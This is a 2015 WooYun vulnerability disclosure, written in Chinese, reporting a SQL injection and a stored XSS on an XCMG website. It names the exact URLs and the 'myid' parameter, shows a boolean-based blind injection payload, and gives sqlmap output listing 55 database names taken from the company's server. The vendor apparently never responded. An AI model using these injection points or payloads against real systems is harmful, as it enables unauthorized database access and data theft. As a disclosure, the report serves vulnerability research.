当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108702

漏洞标题:徐工集团某站存储型XSS&SQL注入

相关厂商:徐工集团

漏洞作者: 小胖纸

提交时间:2015-04-22 17:33

修复时间:2015-06-06 17:34

公开时间:2015-06-06 17:34

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

徐工(xss)各种弹。弹。弹

详细说明:

http://success.xcmg.com/detail.jsp?myid=121


GET parameter 'myid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 215 HTTP(s) req
uests:
---
Parameter: myid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: myid=121 AND 2837=2837
---
[21:25:47] [INFO] testing MySQL
[21:25:47] [WARNING] the back-end DBMS is not MySQL
[21:25:47] [INFO] testing Oracle
[21:25:47] [WARNING] the back-end DBMS is not Oracle
[21:25:47] [INFO] testing PostgreSQL
[21:25:47] [WARNING] the back-end DBMS is not PostgreSQL
[21:25:47] [INFO] testing Microsoft SQL Server
[21:25:47] [INFO] confirming Microsoft SQL Server
[21:25:48] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Apache 2.4.4, JSP
back-end DBMS: Microsoft SQL Server 2005
[21:25:48] [INFO] fetching database names
[21:25:48] [INFO] fetching number of databases
[21:25:48] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[21:25:48] [INFO] retrieved: 55
[21:25:52] [INFO] retrieved: AdventureWorks
[21:26:24] [INFO] retrieved: AdventureWorksDW
[21:27:03] [INFO] retrieved: design_common
[21:27:36] [INFO] retrieved: ebusiness2014
[21:28:08] [INFO] retrieved: green_leaf
[21:28:33] [INFO] retrieved: greenbook
[21:28:54] [INFO] retrieved: huayu
[21:29:11] [INFO] retrieved: jereh_parts
[21:29:39] [INFO] retrieved: jereh_parts_general
[21:30:21] [INFO] retrieved: jerei_shantui_paris
[21:31:04] [INFO] retrieved: jr_used
[21:31:21] [INFO] retrieved: jrcms_customers_visitor
[21:32:14] [INFO] retrieved: jrcms_demo
[21:32:37] [INFO] retrieved: jrcms_detank
[21:33:05] [INFO] retrieved: jrcms_johndeere
[21:33:40] [INFO] retrieved: jrcms_kaiyuan
[21:34:09] [INFO] retrieved: jrcms_lonking
[21:34:41] [INFO] retrieved: jrcms_shuangdi
[21:35:13] [INFO] retrieved: jrcms_xgma
[21:35:36] [INFO] retrieved: jrnet_xiand_sd
[21:36:10] [INFO] retrieved: ksc_parts
[21:36:32] [INFO] retrieved: lg_resource
[21:36:58] [INFO] retrieved: master
[21:37:12] [INFO] retrieved: model
[21:37:24] [INFO] retrieved: msdb
[21:37:35] [INFO] retrieved: parts_2012
[21:37:58] [INFO] retrieved: parts_2014
[21:38:23] [INFO] retrieved: partsSystemNew
[21:38:56] [INFO] retrieved: server_help
[21:39:24] [INFO] retrieved: special_2012
[21:39:52] [INFO] retrieved: special_2013
[21:40:21] [INFO] retrieved: special_2014
[21:40:48] [INFO] retrieved: special_2015
[21:41:19] [INFO] retrieved: special_zyz
[21:41:48] [INFO] retrieved: tempdb
[21:42:06] [INFO] retrieved: test_wcm_platform
[21:42:48] [INFO] retrieved: usa_jereh_crm
[21:43:19] [INFO] retrieved: used_2012
[21:43:42] [INFO] retrieved: used_2013
[21:44:04] [INFO] retrieved: vd_platform
[21:44:31] [INFO] retrieved: vo_mobie_info
[21:45:01] [INFO] retrieved: volvo_game_skyroad
[21:45:43] [INFO] retrieved: volvo_gift_shop
[21:46:21] [INFO] retrieved: volvo_job
[21:46:42] [INFO] retrieved: volvo_order
[21:47:08] [INFO] retrieved: volvo_survey
[21:47:36] [INFO] retrieved: volvo_trucks
[21:48:07] [INFO] retrieved: volvo_wlcx
[21:48:31] [INFO] retrieved: volvoGame
[21:48:52] [INFO] retrieved: vote
[21:49:02] [INFO] retrieved: web21sun_used
[21:49:33] [INFO] retrieved: webdata
[21:49:56] [INFO] retrieved: xcmg_news
[21:50:39] [INFO] retrieved: xugongzl
[21:51:22] [INFO] retrieved: xzgl
available databases [55]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] design_common
[*] ebusiness2014
[*] green_leaf
[*] greenbook
[*] huayu
[*] jereh_parts
[*] jereh_parts_general
[*] jerei_shantui_paris
[*] jr_used
[*] jrcms_customers_visitor
[*] jrcms_demo
[*] jrcms_detank
[*] jrcms_johndeere
[*] jrcms_kaiyuan
[*] jrcms_lonking
[*] jrcms_shuangdi
[*] jrcms_xgma
[*] jrnet_xiand_sd
[*] ksc_parts
[*] lg_resource
[*] master
[*] model
[*] msdb
[*] parts_2012
[*] parts_2014
[*] partsSystemNew
[*] server_help
[*] special_2012
[*] special_2013
[*] special_2014
[*] special_2015
[*] special_zyz
[*] tempdb
[*] test_wcm_platform
[*] usa_jereh_crm
[*] used_2012
[*] used_2013
[*] vd_platform
[*] vo_mobie_info
[*] volvo_game_skyroad
[*] volvo_gift_shop
[*] volvo_job
[*] volvo_order
[*] volvo_survey
[*] volvo_trucks
[*] volvo_wlcx
[*] volvoGame
[*] vote
[*] web21sun_used
[*] webdata
[*] xcmg_news
[*] xugongzl
[*] xzgl


C9GA7B7@U{QM`M@W$(4C2TG.png


无深入。
求挖机小礼品。。

RZ[2AXG4FPLV5CDT})B%D$3.png


底部评论框!
http://success.xcmg.com/video_detail.jsp?myid=73
各种弹。不一一测试了。

漏洞证明:

RZ[2AXG4FPLV5CDT})B%D$3.png


底部评论框!
各种弹。不一一测试了。

修复方案:

版权声明:转载请注明来源 小胖纸@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝